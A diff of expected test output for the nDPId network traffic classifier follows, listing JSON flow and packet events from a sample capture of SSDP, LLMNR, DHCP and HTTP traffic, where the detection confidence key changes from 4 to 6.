00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1470104382241,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382241,"pkt":"AQBef\/\/6uKxvwfbSCABFAAChJ0YAAAERfELAqGUh7\/\/\/+ti9B2wAjWL8TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":587,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382241,"flow_last_seen":1470104382241,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382241,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"239.255.255.250","src_port":55485,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1470104382242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104382242,"pkt":"AQBef\/\/6cPGh+Cr9CABFAAChfYYAAAERhhrAqAUJ7\/\/\/+ti8B2wAjcMVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382242,"flow_last_seen":1470104382242,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1470104382242,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"239.255.255.250","src_port":55484,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104382448,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104382448,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed0AAAERmP3AqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1470104382448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104382448,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCesAAAQR9onAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104382448,"flow_last_seen":1470104382448,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104382448,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":51704,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1470104382857,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":95,"pkt_l4_len":41,"thread_ts_msec":1470104382857,"pkt":"MzMAAQAD6LH8q\/uyht1gAAAAACkRAf6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAQAD8GwU6wApG1\/NkQAAAAEAAAAAAAAPY2Flc2FyLXRoaW5rcGFkAAD\/AAE="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1470104382858,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1470104382858,"pkt":"AQBeAAD86LH8q\/uyCABFAAA9ed8AAAERmPvAqAUx4AAA\/PBsFOsAKYTXzZEAAAABAAAAAAAAD2NhZXNhci10aGlua3BhZAAA\/wAB"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":604,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1470104383675,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104383675,"pkt":"AQBef\/\/6zD2CHu7jCABFAAClQLYAAAQRv8DAqAUv7\/\/\/+utrB2wAkWQETS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00837{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1470104383810,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104383810,"pkt":"TF4M6gNlYMVHBbyMCABFAAFI+0MAAEARgP\/AqAUQwKh3AQBEAEMBNFvxAQEGABeXwMwAAAAAwKgFEAAAAAAAAAAAAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEDNwkBAwYPd1\/8LC45AgXcPQcBYMVHBbyMMwQAdqcADAtNYWNCb29rLUFpcv8AAAAAAAAAAAAAAAAA"} -00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} +00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104383810,"flow_last_seen":1470104383810,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1470104383810,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.119.1","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"macbook-air","fingerprint":"1,3,6,15,119,95,252,44,46","class_ident":""}} 00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1470104383815,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104383815,"pkt":"ABxCjnAxTF4M6gNlCABFAAFIAAAAABARrEPAqHcBwKgFEABDAEQBNHbOAgEGABeXwMwAAAAAwKgFEMCoBRDAqHcBAAAAAGDFRwW8jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqHcBMwQAAAA8AQT\/\/wAAAwTAqHcBBhCoXwEBCAgICKhfwAEICAQE\/wAAAAAAAAAAAAAAAAAA"} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1470104384085,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104384085,"pkt":"AQBef\/\/6\/PiuMpcsCABFAAChLEMAAAER2QfAqANf7\/\/\/+uhMB2wAjbUvTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1470104384289,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104384289,"pkt":"AQBef\/\/6CJ4BzeuNCABFAAChFFAAAAER7zTAqAUl7\/\/\/+t\/tB2wAjbvITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} @@ -263,7 +263,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":693,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1470104390443,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104390443,"pkt":"TF4M6gNlYMVHBbyMCABFAABAN95AAEAG+rLAqAUQROn9hdF4AFAesUW4AAAAALAC\/\/+iVAAAAgQFtAEDAwUBAQgKGg88QAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":694,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1470104390640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104390640,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADUGPZVE6f2FwKgFEABQ0Xh2OO96HrFFuaASFqBImwAAAgQFtAQCCArPHh84Gg88QAEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1470104390640,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104390640,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0PI1AAEAG9g\/AqAUQROn9hdF4AFAesUW5djjve4AQEBV9LwAAAQEIChoPPQTPHh84"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":696,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104390443,"flow_last_seen":1470104390642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1470104390642,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"68.233.253.133","src_port":53624,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"api.magicansoft.com","url":"api.magicansoft.com\/comMagicanApi\/composite\/app.php\/Global\/Index\/ip","code":0,"content_type":"","user_agent":"Magican (unknown version) CFNetwork\/720.5.7 Darwin\/14.5.0 (x86_64)"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1470104390741,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":697,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1470104390741,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":185,"pkt_l4_len":131,"thread_ts_msec":1470104390741,"pkt":"MzMAAAABTF4MmuxUht1gAAAAAIMRAf6AAAAAAAAATl4M\/\/6a7FT\/AgAAAAAAAAAAAAAAAAABFi4WLgCDan0ABGg\/AAEABkxeDJrsVAAFAAAABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABHzzfwAACwAJM0RYWS1LSEdEAAwADUNSUzEyNS0yNEctMVMADgABAQAPABD+gAAAAAAAAE5eDP\/+muxUABAAB2JyaWRnZTE="} 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} @@ -273,33 +273,33 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} 